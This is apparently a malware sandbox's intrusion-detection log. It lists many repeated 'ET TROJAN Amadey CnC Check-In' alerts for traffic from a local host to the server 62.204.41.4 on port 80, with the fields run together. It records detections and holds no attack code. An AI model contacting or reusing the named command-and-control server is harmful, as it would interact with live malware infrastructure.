                            192.168.2.562.204.41.450393802027700 02/07/23-20:00:14.802337TCP2027700ET TROJAN Amadey CnC Check-In5039380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449792802027700 02/07/23-19:57:29.791091TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449869802027700 02/07/23-19:57:51.811174TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449999802027700 02/07/23-19:58:27.278096TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450088802027700 02/07/23-19:58:51.281257TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450370802027700 02/07/23-20:00:09.189137TCP2027700ET TROJAN Amadey CnC Check-In5037080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450281802027700 02/07/23-19:59:45.414960TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450110802027700 02/07/23-19:58:56.657477TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450021802027700 02/07/23-19:58:32.794730TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450177802027700 02/07/23-19:59:15.563617TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450419802027700 02/07/23-20:00:23.118934TCP2027700ET TROJAN Amadey CnC Check-In5041980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450269802027700 02/07/23-19:59:40.413543TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449993802027700 02/07/23-19:58:24.614337TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450009802027700 02/07/23-19:58:29.797002TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449812802027700 02/07/23-19:57:34.636727TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449879802027700 02/07/23-19:57:53.960321TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449720802027700 02/07/23-19:57:10.789751TCP2027700ET TROJAN Amadey CnC Check-In4972080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449723802027700 02/07/23-19:57:11.507306TCP2027700ET TROJAN Amadey CnC Check-In4972380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449968802027700 02/07/23-19:58:17.511977TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449901802027700 02/07/23-19:57:59.369719TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450238802027700 02/07/23-19:59:32.939539TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450149802027700 02/07/23-19:59:08.801458TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449708802027700 02/07/23-19:57:08.619164TCP2027700ET TROJAN Amadey CnC Check-In4970880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450250802027700 02/07/23-19:59:35.782201TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450253802027700 02/07/23-19:59:36.518712TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450327802027700 02/07/23-19:59:56.530972TCP2027700ET TROJAN Amadey CnC Check-In5032780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450416802027700 02/07/23-20:00:22.006473TCP2027700ET TROJAN Amadey CnC Check-In5041680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450342802027700 02/07/23-20:00:00.462429TCP2027700ET TROJAN Amadey CnC Check-In5034280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450161802027700 02/07/23-19:59:11.700306TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450431802027700 02/07/23-20:00:25.972242TCP2027700ET TROJAN Amadey CnC Check-In5043180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450291802027700 02/07/23-19:59:47.841889TCP2027700ET TROJAN Amadey CnC Check-In5029180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450294802027700 02/07/23-19:59:48.563161TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449891802027700 02/07/23-19:57:56.954067TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450075802027700 02/07/23-19:58:48.119366TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450164802027700 02/07/23-19:59:12.434295TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449914802027700 02/07/23-19:58:02.515565TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449980802027700 02/07/23-19:58:20.421307TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449850802027700 02/07/23-19:57:44.320306TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450225802027700 02/07/23-19:59:29.829004TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450355802027700 02/07/23-20:00:05.610275TCP2027700ET TROJAN Amadey CnC Check-In5035580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449736802027700 02/07/23-19:57:14.683730TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449866802027700 02/07/23-19:57:51.087084TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449825802027700 02/07/23-19:57:37.561460TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449996802027700 02/07/23-19:58:26.579679TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450006802027700 02/07/23-19:58:29.008274TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449955802027700 02/07/23-19:58:14.419186TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450136802027700 02/07/23-19:59:05.899724TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449777802027700 02/07/23-19:57:23.720957TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450266802027700 02/07/23-19:59:39.687644TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450396802027700 02/07/23-20:00:15.510798TCP2027700ET TROJAN Amadey CnC Check-In5039680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450314802027700 02/07/23-19:59:53.406803TCP2027700ET TROJAN Amadey CnC Check-In5031480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450444802027700 02/07/23-20:00:29.095831TCP2027700ET TROJAN Amadey CnC Check-In5044480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450403802027700 02/07/23-20:00:17.175192TCP2027700ET TROJAN Amadey CnC Check-In5040380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450059802027700 02/07/23-19:58:41.853764TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450157802027700 02/07/23-19:59:10.761628TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450062802027700 02/07/23-19:58:42.938578TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449829802027700 02/07/23-19:57:38.585640TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449927802027700 02/07/23-19:58:07.969609TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449832802027700 02/07/23-19:57:39.308335TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450160802027700 02/07/23-19:59:11.468507TCP2027700ET TROJAN Amadey CnC Check-In5016080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449734802027700 02/07/23-19:57:14.182238TCP2027700ET TROJAN Amadey CnC Check-In4973480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450451802027700 02/07/23-20:00:30.804845TCP2027700ET TROJAN Amadey CnC Check-In5045180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450001802027700 02/07/23-19:58:27.747122TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450255802027700 02/07/23-19:59:37.003438TCP2027700ET TROJAN Amadey CnC Check-In5025580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450353802027700 02/07/23-20:00:05.126188TCP2027700ET TROJAN Amadey CnC Check-In5035380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449930802027700 02/07/23-19:58:08.681863TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449988802027700 02/07/23-19:58:22.324290TCP2027700ET TROJAN Amadey CnC Check-In4998880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449762802027700 02/07/23-19:57:20.088453TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450090802027700 02/07/23-19:58:51.779336TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449860802027700 02/07/23-19:57:49.596112TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450095802027700 02/07/23-19:58:53.020938TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450448802027700 02/07/23-20:00:30.077914TCP2027700ET TROJAN Amadey CnC Check-In5044880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449963802027700 02/07/23-19:58:16.325115TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450423802027700 02/07/23-20:00:24.067700TCP2027700ET TROJAN Amadey CnC Check-In5042380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449804802027700 02/07/23-19:57:32.699147TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450386802027700 02/07/23-20:00:13.098003TCP2027700ET TROJAN Amadey CnC Check-In5038680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450132802027700 02/07/23-19:59:02.326823TCP2027700ET TROJAN Amadey CnC Check-In5013280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449770802027700 02/07/23-19:57:21.824482TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449983802027700 02/07/23-19:58:21.153208TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450227802027700 02/07/23-19:59:30.297316TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450222802027700 02/07/23-19:59:29.105694TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449739802027700 02/07/23-19:57:15.413161TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450185802027700 02/07/23-19:59:17.468502TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450381802027700 02/07/23-20:00:11.899082TCP2027700ET TROJAN Amadey CnC Check-In5038180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449898802027700 02/07/23-19:57:58.651415TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450317802027700 02/07/23-19:59:54.125434TCP2027700ET TROJAN Amadey CnC Check-In5031780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450104802027700 02/07/23-19:58:55.183792TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450358802027700 02/07/23-20:00:06.314097TCP2027700ET TROJAN Amadey CnC Check-In5035880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449857802027700 02/07/23-19:57:48.874538TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449893802027700 02/07/23-19:57:57.434157TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449935802027700 02/07/23-19:58:09.870706TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449697802027700 02/07/23-19:57:03.625893TCP2027700ET TROJAN Amadey CnC Check-In4969780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450026802027700 02/07/23-19:58:34.056162TCP2027700ET TROJAN Amadey CnC Check-In5002680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450067802027700 02/07/23-19:58:46.185179TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450263802027700 02/07/23-19:59:38.967068TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450373802027700 02/07/23-20:00:09.942649TCP2027700ET TROJAN Amadey CnC Check-In5037380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449754802027700 02/07/23-19:57:18.680477TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449852802027700 02/07/23-19:57:46.015163TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450082802027700 02/07/23-19:58:49.824851TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450410802027700 02/07/23-20:00:18.845590TCP2027700ET TROJAN Amadey CnC Check-In5041080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449840802027700 02/07/23-19:57:41.244153TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450079802027700 02/07/23-19:58:49.105142TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450202802027700 02/07/23-19:59:21.791441TCP2027700ET TROJAN Amadey CnC Check-In5020280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450300802027700 02/07/23-19:59:50.001268TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450018802027700 02/07/23-19:58:32.051728TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450198802027700 02/07/23-19:59:20.390515TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450116802027700 02/07/23-19:58:58.086949TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449907802027700 02/07/23-19:58:00.832041TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449787802027700 02/07/23-19:57:28.606188TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450428802027700 02/07/23-20:00:25.267783TCP2027700ET TROJAN Amadey CnC Check-In5042880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449910802027700 02/07/23-19:58:01.546921TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450345802027700 02/07/23-20:00:01.959618TCP2027700ET TROJAN Amadey CnC Check-In5034580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449782802027700 02/07/23-19:57:25.569842TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449824802027700 02/07/23-19:57:37.320314TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450152802027700 02/07/23-19:59:09.531894TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449809802027700 02/07/23-19:57:33.899731TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450235802027700 02/07/23-19:59:32.185122TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449726802027700 02/07/23-19:57:12.281502TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450054802027700 02/07/23-19:58:40.604509TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450309802027700 02/07/23-19:59:52.188472TCP2027700ET TROJAN Amadey CnC Check-In5030980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450407802027700 02/07/23-20:00:18.142047TCP2027700ET TROJAN Amadey CnC Check-In5040780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450137802027700 02/07/23-19:59:06.138198TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449902802027700 02/07/23-19:57:59.605442TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450230802027700 02/07/23-19:59:30.997466TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449865802027700 02/07/23-19:57:50.851457TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449943802027700 02/07/23-19:58:11.590299TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450443802027700 02/07/23-20:00:28.848844TCP2027700ET TROJAN Amadey CnC Check-In5044380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450271802027700 02/07/23-19:59:41.182547TCP2027700ET TROJAN Amadey CnC Check-In5027180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449790802027700 02/07/23-19:57:29.323510TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450087802027700 02/07/23-19:58:51.030172TCP2027700ET TROJAN Amadey CnC Check-In5008780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450129802027700 02/07/23-19:59:01.428744TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450046802027700 02/07/23-19:58:38.668972TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449873802027700 02/07/23-19:57:52.544613TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450415802027700 02/07/23-20:00:21.209012TCP2027700ET TROJAN Amadey CnC Check-In5041580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449795802027700 02/07/23-19:57:30.522001TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449878802027700 02/07/23-19:57:53.715011TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449837802027700 02/07/23-19:57:40.510394TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450165802027700 02/07/23-19:59:12.675415TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450378802027700 02/07/23-20:00:11.173249TCP2027700ET TROJAN Amadey CnC Check-In5037880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450124802027700 02/07/23-19:59:00.013175TCP2027700ET TROJAN Amadey CnC Check-In5012480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450337802027700 02/07/23-19:59:58.938844TCP2027700ET TROJAN Amadey CnC Check-In5033780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450207802027700 02/07/23-19:59:25.359503TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450341802027700 02/07/23-20:00:00.154878TCP2027700ET TROJAN Amadey CnC Check-In5034180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449722802027700 02/07/23-19:57:11.275289TCP2027700ET TROJAN Amadey CnC Check-In4972280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449976802027700 02/07/23-19:58:19.455952TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450436802027700 02/07/23-20:00:27.196537TCP2027700ET TROJAN Amadey CnC Check-In5043680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450430802027700 02/07/23-20:00:25.739838TCP2027700ET TROJAN Amadey CnC Check-In5043080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449719802027700 02/07/23-19:57:10.555436TCP2027700ET TROJAN Amadey CnC Check-In4971980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450338802027700 02/07/23-19:59:59.187277TCP2027700ET TROJAN Amadey CnC Check-In5033880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450427802027700 02/07/23-20:00:25.032850TCP2027700ET TROJAN Amadey CnC Check-In5042780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449808802027700 02/07/23-19:57:33.669443TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449906802027700 02/07/23-19:58:00.574287TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449817802027700 02/07/23-19:57:35.876380TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450329802027700 02/07/23-19:59:57.013885TCP2027700ET TROJAN Amadey CnC Check-In5032980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450074802027700 02/07/23-19:58:47.870199TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449915802027700 02/07/23-19:58:02.781708TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450172802027700 02/07/23-19:59:14.371003TCP2027700ET TROJAN Amadey CnC Check-In5017280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450013802027700 02/07/23-19:58:30.820175TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450270802027700 02/07/23-19:59:40.657861TCP2027700ET TROJAN Amadey CnC Check-In5027080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449948802027700 02/07/23-19:58:12.777625TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450083802027700 02/07/23-19:58:50.074970TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450402802027700 02/07/23-20:00:16.938938TCP2027700ET TROJAN Amadey CnC Check-In5040280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450169802027700 02/07/23-19:59:13.653163TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449750802027700 02/07/23-19:57:18.108794TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450267802027700 02/07/23-19:59:39.920444TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449741802027700 02/07/23-19:57:15.910290TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450178802027700 02/07/23-19:59:15.810186TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450109802027700 02/07/23-19:58:56.416170TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450103802027700 02/07/23-19:58:54.948416TCP2027700ET TROJAN Amadey CnC Check-In5010380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450268802027700 02/07/23-19:59:40.160557TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450357802027700 02/07/23-20:00:06.081116TCP2027700ET TROJAN Amadey CnC Check-In5035780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449779802027700 02/07/23-19:57:24.309471TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449934802027700 02/07/23-19:58:09.625815TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449738802027700 02/07/23-19:57:15.178369TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450014802027700 02/07/23-19:58:31.062717TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449975802027700 02/07/23-19:58:19.199653TCP2027700ET TROJAN Amadey CnC Check-In4997580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450210802027700 02/07/23-19:59:26.169613TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450411802027700 02/07/23-20:00:19.306270TCP2027700ET TROJAN Amadey CnC Check-In5041180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450464802027700 02/07/23-20:00:33.699108TCP2027700ET TROJAN Amadey CnC Check-In5046480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450055802027700 02/07/23-19:58:40.841197TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450144802027700 02/07/23-19:59:07.591286TCP2027700ET TROJAN Amadey CnC Check-In5014480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450181802027700 02/07/23-19:59:16.514939TCP2027700ET TROJAN Amadey CnC Check-In5018180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450340802027700 02/07/23-19:59:59.670957TCP2027700ET TROJAN Amadey CnC Check-In5034080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449721802027700 02/07/23-19:57:11.038423TCP2027700ET TROJAN Amadey CnC Check-In4972180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449886802027700 02/07/23-19:57:55.680683TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450398802027700 02/07/23-20:00:15.996201TCP2027700ET TROJAN Amadey CnC Check-In5039880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449845802027700 02/07/23-19:57:42.455705TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450251802027700 02/07/23-19:59:36.032976TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450197802027700 02/07/23-19:59:20.137780TCP2027700ET TROJAN Amadey CnC Check-In5019780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450239802027700 02/07/23-19:59:33.185655TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449811802027700 02/07/23-19:57:34.389822TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450379802027700 02/07/23-20:00:11.418266TCP2027700ET TROJAN Amadey CnC Check-In5037980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449947802027700 02/07/23-19:58:12.542504TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450214802027700 02/07/23-19:59:27.169597TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450128802027700 02/07/23-19:59:00.987231TCP2027700ET TROJAN Amadey CnC Check-In5012880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450312802027700 02/07/23-19:59:52.924013TCP2027700ET TROJAN Amadey CnC Check-In5031280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450468802027700 02/07/23-20:00:34.647098TCP2027700ET TROJAN Amadey CnC Check-In5046880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450125802027700 02/07/23-19:59:00.262200TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450223802027700 02/07/23-19:59:29.342199TCP2027700ET TROJAN Amadey CnC Check-In5022380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449864802027700 02/07/23-19:57:50.603717TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.562.204.41.4
